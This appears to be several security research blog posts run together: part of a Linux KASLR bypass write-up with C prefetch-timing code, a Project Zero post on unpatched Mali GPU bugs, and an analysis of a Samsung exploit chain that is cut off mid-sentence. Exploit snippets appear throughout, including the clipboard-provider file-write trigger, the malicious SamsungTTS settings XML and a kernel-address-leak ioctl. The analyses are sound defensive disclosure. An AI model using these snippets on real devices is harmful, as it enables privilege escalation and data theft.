Upon reporting this bug to the Linux kernel security team, our suggestion was to start randomizing the location of the percpu cpu_entry_area (CEA), and consequently the associated exception and syscall entry stacks. This is an effective mitigation against remote attackers but is insufficient to prevent a local attacker from taking advantage. Six years ago, Daniel Gruss et al. discovered a new, more reliable technique for exploiting the TLB timing side channel in x86 CPUs. Their results demonstrated that prefetch instructions executed in user mode retired at statistically significant different latencies depending on whether the requested virtual address to be prefetched was mapped vs. unmapped, even if that virtual address was only mapped in kernel mode. kPTI was helpful in mitigating this side channel; however, most modern CPUs now have innate protection for Meltdown, which kPTI was specifically designed to address, and thus kPTI (which has significant performance implications) is disabled on modern microarchitectures. That decision means it is once again possible to take advantage of the prefetch side channel to defeat not only KASLR, but also the CPU entry area randomization mitigation, preserving the viability of the CEA stack corruption exploit technique against modern x86 CPUs.


There are surprisingly few fast and reliable examples of this prefetch KASLR bypass technique available in the open source realm, so I made the decision to write one.

Implementation

The meat of implementing this technique effectively is in serially reading the processor’s time stamp counter before and after performing a prefetch. Daniel Gruss helpfully provided highly effective and open source code for doing just that. The only edit I made (as suggested by Jann Horn) was to swap to using lfence instead of cpuid as the serializing instruction, as cpuid is emulated in VM environments. It also became apparent in practice that there was no need to perform any cache-flushing routines in order to witness the side-channel effect. It is simply enough to time every prefetch attempt.
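A minimal sketch of such a measurement routine, using lfence-serialized rdtsc reads as described (GCC/Clang inline assembly, x86-64 only):

#include <stdint.h>

/* Timestamp read fenced on both sides so it cannot be reordered
 * around the prefetch being timed. */
static inline uint64_t rdtsc_serialized(void) {
    uint32_t lo, hi;
    __asm__ volatile("lfence\n\trdtsc\n\tlfence" : "=a"(lo), "=d"(hi));
    return ((uint64_t)hi << 32) | lo;
}

/* Time a single prefetch of an arbitrary (even unmapped kernel)
 * address; prefetch never faults, so this is safe from user mode. */
uint64_t time_prefetch(uintptr_t addr) {
    uint64_t start = rdtsc_serialized();
    __asm__ volatile("prefetcht0 (%0)" :: "r"(addr) : "memory");
    return rdtsc_serialized() - start;
}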


Generating prefetch timings for all 512 possible KASLR slots yields quite a bit of fuzzy data in need of analysis. To minimize noise, multiple samples of each tested address are taken, and the minimum value from that set of samples is used in the results as the representative value for an address. On the Tiger Lake CPU this test was primarily performed on, no more than 16 samples per slot were needed to generate exceptionally reliable results. Low-resolution minimum prefetch time slot identification narrows down the area to search in while avoiding false positives for the higher resolution edge-detection code, which finds the precise address at which prefetch run-time drops dramatically. The result of this effort is a PoC which can correctly identify the KASLR slide on my local machine with 99.999% accuracy (95% accuracy in a VM) while running faster than it takes to grep through kallsyms for the kernel base address:
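The per-slot minimum filtering might look like the following sketch, assuming the standard x86-64 KASLR parameters (512 candidate slots at 2 MiB stride) and the time_prefetch() helper from the previous sketch:

#include <stdint.h>

#define KERNEL_TEXT_BASE 0xffffffff80000000UL /* standard x86-64 range */
#define SLOT_STRIDE      0x200000UL           /* 2 MiB slot alignment  */
#define NUM_SLOTS        512
#define SAMPLES_PER_SLOT 16

uint64_t time_prefetch(uintptr_t addr); /* from the previous sketch */

/* Record the minimum prefetch time per candidate slot; taking the
 * minimum filters out scheduling and interrupt noise from runs. */
void scan_slots(uint64_t min_times[NUM_SLOTS]) {
    for (int slot = 0; slot < NUM_SLOTS; slot++) {
        uintptr_t addr = KERNEL_TEXT_BASE + (uintptr_t)slot * SLOT_STRIDE;
        uint64_t best = UINT64_MAX;
        for (int s = 0; s < SAMPLES_PER_SLOT; s++) {
            uint64_t t = time_prefetch(addr);
            if (t < best)
                best = t;
        }
        min_times[slot] = best;
    }
}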


Breaking KASLR with Prefetch: Grepping through kallsyms took .077 seconds while using the prefetch technique took .013 seconds


This prefetch code does indeed work to find the locations of the randomized CEA regions in Peter Zijlstra’s proposed patch. However, the journey to that point results in code that demonstrates another deeply significant issue - KASLR is comprehensively compromised on x86 against local attackers, has been for the past several years, and will be for the indefinite future. There are presently no plans in place to resolve the myriad microarchitectural issues that lead to side channels like this one. Future work is needed in this area in order to preserve the integrity of KASLR, or alternatively, it is probably time to accept that KASLR is no longer an effective mitigation against local attackers and to develop defensive code and mitigations that accept its limitations.

Conclusion

This exploit demonstrates a highly reliable and agnostic technique that can allow a broad spectrum of uncontrolled arbitrary write primitives to achieve kernel code execution on x86 platforms. While it is possible to mitigate this exploit technique from a remote context, an attacker in a local context can utilize known microarchitectural side-channels to defeat the current mitigations. Additional work in this area might be valuable to continue to make exploitation more difficult, such as performing in-stack randomization so that the stack offset of the saved state changes on every taken IST exception. For now however, this remains a viable and powerful exploit strategy on x86 Linux.


Mind the Gap

22 November 2022 at 21:05

By Ian Beer, Project Zero

Note: The vulnerabilities discussed in this blog post (CVE-2022-33917) are fixed by the upstream vendor, but at the time of publication, these fixes have not yet made it downstream to affected Android devices (including Pixel, Samsung, Xiaomi, Oppo and others). Devices with a Mali GPU are currently vulnerable. 

Introduction

In June 2022, Project Zero researcher Maddie Stone gave a talk at FirstCon22 titled 0-day In-the-Wild Exploitation in 2022…so far. A key takeaway was that approximately 50% of the observed 0-days in the first half of 2022 were variants of previously patched vulnerabilities. This finding is consistent with our understanding of attacker behavior: attackers will take the path of least resistance, and as long as vendors don't consistently perform thorough root-cause analysis when fixing security vulnerabilities, it will continue to be worth investing time in trying to revive known vulnerabilities before looking for novel ones.

The presentation discussed an in-the-wild exploit targeting the Pixel 6 and leveraging CVE-2021-39793, a vulnerability in the ARM Mali GPU driver used by a large number of other Android devices. ARM's advisory described the vulnerability as:

Title: Mali GPU Kernel Driver may elevate CPU RO pages to writable

CVE: CVE-2022-22706 (also reported in CVE-2021-39793)

Date of issue: 6th January 2022

Impact: A non-privileged user can get a write access to read-only memory pages [sic].

The week before FirstCon22, Maddie gave an internal preview of her talk. Inspired by the description of an in-the-wild vulnerability in low-level memory management code, fellow Project Zero researcher Jann Horn started auditing the ARM Mali GPU driver. Over the next three weeks, Jann found five more exploitable vulnerabilities (2325, 2327, 2331, 2333, 2334).

Taking a closer look

One of these issues (2334) led to kernel memory corruption, one (2331) led to physical memory addresses being disclosed to userspace, and the remaining three (2325, 2327, 2333) led to a physical page use-after-free condition. These would enable an attacker to continue to read and write physical pages after they had been returned to the system.

For example, by forcing the kernel to reuse these pages as page tables, an attacker with native code execution in an app context could gain full access to the system, bypassing Android's permissions model and allowing broad access to user data.

Anecdotally, we heard from multiple sources that the Mali issues we had reported collided with vulnerabilities available in the 0-day market, and we even saw one public reference:

@ProjectZeroBugs: "Arm Mali: driver exposes physical addresses to unprivileged userspace"

@jgrusko, replying to @ProjectZeroBugs: "RIP the feature that was there forever and nobody wanted to report :)"

The "Patch gap" is for vendors, too

We reported these five issues to ARM when they were discovered between June and July 2022. ARM fixed the issues promptly in July and August 2022, disclosing them as security issues on their Arm Mali Driver Vulnerabilities page (assigning CVE-2022-36449) and publishing the patched driver source on their public developer website.

In line with our 2021 disclosure policy update we then waited an additional 30 days before derestricting our Project Zero tracker entries. Between late August and mid-September 2022 we derestricted these issues in the public Project Zero tracker: 2325, 2327, 2331, 2333, 2334.

When time permits and as an additional check, we test the effectiveness of the patches that the vendor has provided. This sometimes leads to follow-up bug reports where a patch is incomplete or a variant is discovered (for a recently compiled list of examples, see the first table in this blogpost), and sometimes we discover the fix isn't there at all.

In this case we discovered that all of our test devices which used Mali are still vulnerable to these issues. CVE-2022-36449 is not mentioned in any downstream security bulletins.

Conclusion

Just as users are recommended to patch as quickly as they can once a release containing security updates is available, so the same applies to vendors and companies. Minimizing the "patch gap" as a vendor in these scenarios is arguably more important, as end users (or other vendors downstream) are blocking on this action before they can receive the security benefits of the patch.

Companies need to remain vigilant, follow upstream sources closely, and do their best to provide complete patches to users as soon as possible.

A Very Powerful Clipboard: Analysis of a Samsung in-the-wild exploit chain

4 November 2022 at 15:50

Posted by Maddie Stone, Project Zero

Note: The three vulnerabilities discussed in this blog were all fixed in Samsung’s March 2021 release. They were fixed as CVE-2021-25337, CVE-2021-25369, CVE-2021-25370. To ensure your Samsung device is up-to-date, you can check under Settings that your device is running SMR Mar-2021 or later.

As defenders, in-the-wild exploit samples give us important insight into what attackers are really doing. We get the “ground truth” data about the vulnerabilities and exploit techniques they’re using, which then informs our further research and guidance to security teams on what could have the biggest impact or return on investment. To do this, we need to know that the vulnerabilities and exploit samples were found in-the-wild. Over the past few years there’s been tremendous progress in vendors transparently disclosing when a vulnerability is known to be exploited in-the-wild: Adobe, Android, Apple, ARM, Chrome, Microsoft, Mozilla, and others are sharing this information via their security release notes.

While we understand that Samsung has yet to annotate any vulnerabilities as in-the-wild, going forward, Samsung has committed to publicly sharing when vulnerabilities may be under limited, targeted exploitation, as part of their release notes.

We hope that, like Samsung, others will join their industry peers in disclosing when there is evidence to suggest that a vulnerability is being exploited in-the-wild in one of their products.

The exploit sample

The Google Threat Analysis Group (TAG) obtained a partial exploit chain for Samsung devices that TAG believes belonged to a commercial surveillance vendor. These exploits were likely discovered in the testing phase. The sample is from late 2020. The chain merited further analysis because it is a 3 vulnerability chain where all 3 vulnerabilities are within Samsung custom components, including a vulnerability in a Java component. This exploit analysis was completed in collaboration with Clement Lecigne from TAG.

The sample used three vulnerabilities, all patched in March 2021 by Samsung:

  1. Arbitrary file read/write via the clipboard provider - CVE-2021-25337
  2. Kernel information leak via sec_log - CVE-2021-25369
  3. Use-after-free in the Display Processing Unit (DPU) driver - CVE-2021-25370

The exploit sample targets Samsung phones running kernel 4.14.113 with the Exynos SOC. Samsung phones run one of two types of SOCs depending on where they’re sold. For example, the Samsung phones sold in the United States, China, and a few other countries use a Qualcomm SOC, while phones sold in most other places (e.g. Europe and Africa) run an Exynos SOC. The exploit sample relies on both the Mali GPU driver and the DPU driver, which are specific to the Exynos Samsung phones.

Examples of Samsung phones that were running kernel 4.14.113 in late 2020 (when this sample was found) include the S10, A50, and A51.

The in-the-wild sample that was obtained is a JNI native library file that would have been loaded as a part of an app. Unfortunately TAG did not obtain the app that would have been used with this library. Getting initial code execution via an application is a path that we’ve seen in other campaigns this year. TAG and Project Zero published detailed analyses of one of these campaigns in June.

Vulnerability #1 - Arbitrary filesystem read and write

The exploit chain used CVE-2021-25337 for an initial arbitrary file read and write. The exploit is running as the untrusted_app SELinux context, but uses the system_server SELinux context to open files that it usually wouldn’t be able to access. This bug was due to a lack of access control in a custom Samsung clipboard provider that runs as the system user.

Screenshot of the CVE-2021-25337 entry from Samsung's March 2021 security update. It reads: "SVE-2021-19527 (CVE-2021-25337): Arbitrary file read/write vulnerability via unprotected clipboard content provider. Severity: Moderate. Affected versions: P(9.0), Q(10.0), R(11.0) devices except ONEUI 3.1 in R(11.0). Reported on: November 3, 2020. Disclosure status: Privately disclosed. An improper access control in clipboard service prior to SMR MAR-2021 Release 1 allows untrusted applications to read or write arbitrary files in the device. The patch adds the proper caller check to prevent improper access to clipboard service."

About Android content providers

In Android, Content Providers manage the storage and system-wide access of different data. Content providers organize their data as tables with columns representing the type of data collected and the rows representing each piece of data. Content providers are required to implement six abstract methods: query, insert, update, delete, getType, and onCreate. All of these methods besides onCreate are called by a client application.

According to the Android documentation:


All applications can read from or write to your provider, even if the underlying data is private, because by default your provider does not have permissions set. To change this, set permissions for your provider in your manifest file, using attributes or child elements of the <provider> element. You can set permissions that apply to the entire provider, or to certain tables, or even to certain records, or all three.

The vulnerability

Samsung created a custom clipboard content provider that runs within the system server. The system server is a very privileged process on Android that manages many of the services critical to the functioning of the device, such as the WifiService and TimeZoneDetectorService. The system server runs as the privileged system user (UID 1000, AID_system) and under the system_server SELinux context.

Samsung added a custom clipboard content provider to the system server. This custom clipboard provider is specifically for images. In the com.android.server.semclipboard.SemClipboardProvider class, there are the following variables:


        DATABASE_NAME = "clipboardimage.db"

        TABLE_NAME = "ClipboardImageTable"

        URL = "content://com.sec.android.semclipboardprovider/images"

        CREATE_TABLE = " CREATE TABLE ClipboardImageTable (id INTEGER PRIMARY KEY AUTOINCREMENT,  _data TEXT NOT NULL);";

Unlike content providers that live in “normal” apps and can restrict access via permissions in their manifest as explained above, content providers in the system server are responsible for restricting access in their own code. The system server is a single JAR (services.jar) on the firmware image and doesn’t have a manifest for any permissions to go in. Therefore it’s up to the code within the system server to do its own access checking.

UPDATE 10 Nov 2022: The system server code is not an app in its own right. Instead its code lives in a JAR, services.jar. Its manifest is found in /system/framework/framework-res.apk. In this case, the entry for the SemClipboardProvider in the manifest is:

<provider android:name="com.android.server.semclipboard.SemClipboardProvider" android:enabled="true" android:exported="true" android:multiprocess="false" android:authorities="com.sec.android.semclipboardprovider" android:singleUser="true"/>

Like “normal” app-defined components, the system server could use the android:permission attribute to control access to the provider, but it does not. Since there is not a permission required to access the SemClipboardProvider via the manifest, any access control must come from the provider code itself. Thanks to Edward Cunningham for pointing this out!

The ClipboardImageTable defines only two columns for the table as seen above: id and _data. The column name _data has a special use in Android content providers. It can be used with the openFileHelper method to open a file at a specified path. Only the URI of the row in the table is passed to openFileHelper and a ParcelFileDescriptor object for the path stored in that row is returned. The ParcelFileDescriptor class then provides the getFd method to get the native file descriptor (fd) for the returned ParcelFileDescriptor.

    public Uri insert(Uri uri, ContentValues values) {

        long row = this.database.insert(TABLE_NAME, "", values);

        if (row > 0) {

            Uri newUri = ContentUris.withAppendedId(CONTENT_URI, row);

            getContext().getContentResolver().notifyChange(newUri, null);

            return newUri;

        }

        throw new SQLException("Fail to add a new record into " + uri);

    }

The function above is the vulnerable insert() method in com.android.server.semclipboard.SemClipboardProvider. There is no access control included in this function so any app, including the untrusted_app SELinux context, can modify the _data column directly. By calling insert, an app can open files via the system server that it wouldn’t usually be able to open on its own.

The exploit triggered the vulnerability with the following code from an untrusted application on the device. This code returned a raw file descriptor.

ContentValues vals = new ContentValues();

vals.put("_data", "/data/system/users/0/newFile.bin");

Uri semclipboard_uri = Uri.parse("content://com.sec.android.semclipboardprovider");

ContentResolver resolver = getContentResolver();

Uri newFile_uri = resolver.insert(semclipboard_uri, vals);

return resolver.openFileDescriptor(newFile_uri, "w").getFd(); 

Let’s walk through what is happening line by line:

  1. Create a ContentValues object. This holds the key, value pair that the caller wants to insert into a provider’s database table. The key is the column name and the value is the row entry.
  2. Set the ContentValues object: the key is set to “_data” and the value to an arbitrary file path, controlled by the exploit.
  3. Get the URI to access the semclipboardprovider. This is set in the SemClipboardProvider class.
  4. Get the ContentResolver object that allows apps access to ContentProviders.
  5. Call insert on the semclipboardprovider with our key-value pair.
  6. Open the file that was passed in as the value and return the raw file descriptor. openFileDescriptor calls the content provider’s openFile, which in this case simply calls openFileHelper.

The exploit wrote its next-stage binary to the directory /data/system/users/0/. The dropped file will have an SELinux context of users_system_data_file. A normal untrusted_app domain doesn’t have access to open or create users_system_data_file files, so in this case the exploit proxies the open through system_server, which can open users_system_data_file. While untrusted_app can’t open users_system_data_file files itself, it can read and write them: once the clipboard content provider opens the file and passes the fd to the calling process, the calling process can read and write to it.

The exploit first uses this fd to write its next-stage ELF file onto the file system. The contents of the stage 2 ELF were embedded within the original sample.

This vulnerability is triggered three more times throughout the chain as we’ll see below.

Fixing the vulnerability

To fix the vulnerability, Samsung added access checks to the functions in the SemClipboardProvider. The insert method now checks that the UID of the calling process is 1000, meaning that the caller is already running with system privileges.

  public Uri insert(Uri uri, ContentValues values) {

        if (Binder.getCallingUid() != 1000) {

            Log.e(TAG, "Fail to insert image clip uri. blocked the access of package : " + getContext().getPackageManager().getNameForUid(Binder.getCallingUid()));

            return null;

        }

        long row = this.database.insert(TABLE_NAME, "", values);

        if (row > 0) {

            Uri newUri = ContentUris.withAppendedId(CONTENT_URI, row);

            getContext().getContentResolver().notifyChange(newUri, null);

            return newUri;

        }

        throw new SQLException("Fail to add a new record into " + uri);

    }

Executing the stage 2 ELF

The exploit has now written its stage 2 binary to the file system, but how does it load the binary outside of its current app sandbox? Using the Samsung Text to Speech application (SamsungTTS.apk).

The Samsung Text to Speech application (com.samsung.SMT) is a pre-installed system app running on Samsung devices. It is also running as the system UID, though as a slightly less privileged SELinux context, system_app rather than system_server. There has been at least one previously public vulnerability where this app was used to gain code execution as system. What’s different this time though is that the exploit doesn’t need another vulnerability; instead it reuses the stage 1 vulnerability in the clipboard to arbitrarily write files on the file system.

Older versions of the SamsungTTS application stored the file path for their engine in their Settings files. When a service in the application was started, it obtained the path from the Settings file and would load that file path as a native library using the System.load API.

The exploit takes advantage of this by using the stage 1 vulnerability to write its file path to the Settings file and then starting the service, which loads the stage 2 executable file as the system UID in the system_app SELinux context.

To do this, the exploit uses the stage 1 vulnerability to write the following contents to two different files: /data/user_de/0/com.samsung.SMT/shared_prefs/SamsungTTSSettings.xml and /data/data/com.samsung.SMT/shared_prefs/SamsungTTSSettings.xml. Depending on the version of the phone and application, the SamsungTTS app uses these 2 different paths for its Settings files.

<?xml version='1.0' encoding='utf-8' standalone='yes' ?>

      <map>

          <string name="eng-USA-Variant Info">f00</string>

          <string name="SMT_STUBCHECK_STATUS">STUB_SUCCESS</string>

          <string name="SMT_LATEST_INSTALLED_ENGINE_PATH">/data/system/users/0/newFile.bin</string>

      </map>

The SMT_LATEST_INSTALLED_ENGINE_PATH is the file path passed to System.load(). To initiate the process of the system loading, the exploit stops and restarts the SamsungTTSService by sending two intents to the application. The SamsungTTSService then initiates the load and the stage 2 ELF begins executing as the system user in the system_app SELinux context.

The exploit sample is from at least November 2020. As of November 2020, some devices had a version of the SamsungTTS app that did this arbitrary file loading while others did not. App versions 3.0.04.14 and before included the arbitrary loading capability. It seems that devices released on Android 10 (Q) shipped with the updated version of the SamsungTTS app, which did not load an ELF file based on the path in the settings file. For example, the A51 device that launched in late 2019 on Android 10 shipped with version 3.0.08.18 of the SamsungTTS app, which does not include the functionality that would load the ELF.

Phones released on Android P and earlier seem to have had a pre-3.0.08.18 version of the app, which does load the executable, up through December 2020. For example, the SamsungTTS app from this A50 device on the November 2020 security patch level was version 3.0.03.22, which did load from the Settings file.

Once the ELF file is loaded via the System.load API, it begins executing. It includes two additional exploits to gain kernel read and write privileges as the root user.

Vulnerability #2 - task_struct and sys_call_table address leak

Once the second stage ELF is running (and as system), the exploit then continues. The second vulnerability (CVE-2021-25369) used by the chain is an information leak to leak the address of the task_struct and sys_call_table. The leaked sys_call_table address is used to defeat KASLR. The addr_limit pointer, which is used later to gain arbitrary kernel read and write, is calculated from the leaked task_struct address.

The vulnerability is in the access permissions of a custom Samsung logging file: /data/log/sec_log.log.

Screenshot of the CVE-2021-25369 entry from Samsung's March 2021 security update. It reads: "SVE-2021-19897 (CVE-2021-25369): Potential kernel information exposure from sec_log. Severity: Moderate. Affected versions: O(8.x), P(9.0), Q(10.0). Reported on: December 10, 2020. Disclosure status: Privately disclosed. An improper access control vulnerability in sec_log file prior to SMR MAR-2021 Release 1 exposes sensitive kernel information to userspace. The patch removes the vulnerable file."

The exploit abused a WARN_ON in order to leak the two kernel addresses and therefore break ASLR. WARN_ON is intended to only be used in situations where a kernel bug is detected because it prints a full backtrace, including stack trace and register values, to the kernel logging buffer, /dev/kmsg.

void __warn(const char *file, int line, void *caller, unsigned taint,

            struct pt_regs *regs, struct warn_args *args)

{

        disable_trace_on_warning();

        pr_warn("------------[ cut here ]------------\n");

        if (file)

                pr_warn("WARNING: CPU: %d PID: %d at %s:%d %pS\n",

                        raw_smp_processor_id(), current->pid, file, line,

                        caller);

        else

                pr_warn("WARNING: CPU: %d PID: %d at %pS\n",

                        raw_smp_processor_id(), current->pid, caller);

        if (args)

                vprintk(args->fmt, args->args);

        if (panic_on_warn) {

                /*

                 * This thread may hit another WARN() in the panic path.

                 * Resetting this prevents additional WARN() from panicking the

                 * system on this thread.  Other threads are blocked by the

                 * panic_mutex in panic().

                 */

                panic_on_warn = 0;

                panic("panic_on_warn set ...\n");

        }

        print_modules();

        dump_stack();

        print_oops_end_marker();

        /* Just a warning, don't kill lockdep. */

        add_taint(taint, LOCKDEP_STILL_OK);

}

On Android, the ability to read from kmsg is scoped to privileged users and contexts. While kmsg is readable by system_server, it is not readable from the system_app context, which means it’s not readable by the exploit. 

a51:/ $ ls -alZ /dev/kmsg

crw-rw---- 1 root system u:object_r:kmsg_device:s0 1, 11 2022-10-27 21:48 /dev/kmsg

$ sesearch -A -s system_server -t kmsg_device -p read precompiled_sepolicy

allow domain dev_type:lnk_file { getattr ioctl lock map open read };

allow system_server kmsg_device:chr_file { append getattr ioctl lock map open read write };

Samsung however has added a custom logging feature that copies kmsg to the sec_log. The sec_log is a file found at /data/log/sec_log.log.

The WARN_ON that the exploit triggers is in the Mali GPU graphics driver provided by ARM. ARM replaced the WARN_ON with a call to the more appropriate helper pr_warn in release BX304L01B-SW-99002-r21p0-01rel1 in February 2020. However, the A51 (SM-A515F) and A50 (SM-A505F) still used a vulnerable version of the driver (r19p0) as of January 2021.

/**

 * kbasep_vinstr_hwcnt_reader_ioctl() - hwcnt reader's ioctl.

 * @filp:   Non-NULL pointer to file structure.

 * @cmd:    User command.

 * @arg:    Command's argument.

 *

 * Return: 0 on success, else error code.

 */

static long kbasep_vinstr_hwcnt_reader_ioctl(

        struct file *filp,

        unsigned int cmd,

        unsigned long arg)

{

        long rcode;

        struct kbase_vinstr_client *cli;

        if (!filp || (_IOC_TYPE(cmd) != KBASE_HWCNT_READER))

                return -EINVAL;

        cli = filp->private_data;

        if (!cli)

                return -EINVAL;

        switch (cmd) {

        case KBASE_HWCNT_READER_GET_API_VERSION:

                rcode = put_user(HWCNT_READER_API, (u32 __user *)arg);

                break;

        case KBASE_HWCNT_READER_GET_HWVER:

                rcode = kbasep_vinstr_hwcnt_reader_ioctl_get_hwver(

                        cli, (u32 __user *)arg);

                break;

        case KBASE_HWCNT_READER_GET_BUFFER_SIZE:

                rcode = put_user(

                        (u32)cli->vctx->metadata->dump_buf_bytes,

                        (u32 __user *)arg);

                break;

       

        [...]

        default:

                WARN_ON(true);

                rcode = -EINVAL;

                break;

        }

        return rcode;

}

Specifically, the WARN_ON is in the function kbasep_vinstr_hwcnt_reader_ioctl. To trigger it, the exploit only needs to call an invalid ioctl number for the HWCNT driver and the WARN_ON will be hit. The exploit makes two ioctl calls: the first is the Mali driver’s HWCNT_READER_SETUP
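For illustration, hitting that default: branch only requires an ioctl on the HWCNT reader fd with a command number the switch statement doesn't handle. A sketch, where the magic value is taken from the public Mali driver headers and should be treated as an assumption to verify against the driver version in question:

#include <sys/ioctl.h>

/* Assumed from mali_kbase_hwcnt_reader.h; verify for your driver. */
#define KBASE_HWCNT_READER 0xBE

/* hwcnt_fd is the fd returned by the HWCNT reader setup ioctl on the
 * kbase device. Any command with the reader's magic type but an
 * unhandled number falls through to WARN_ON(true), dumping registers
 * into kmsg and, on these devices, into sec_log. */
int trigger_warn_on(int hwcnt_fd) {
    return ioctl(hwcnt_fd, _IO(KBASE_HWCNT_READER, 0xff), 0);
}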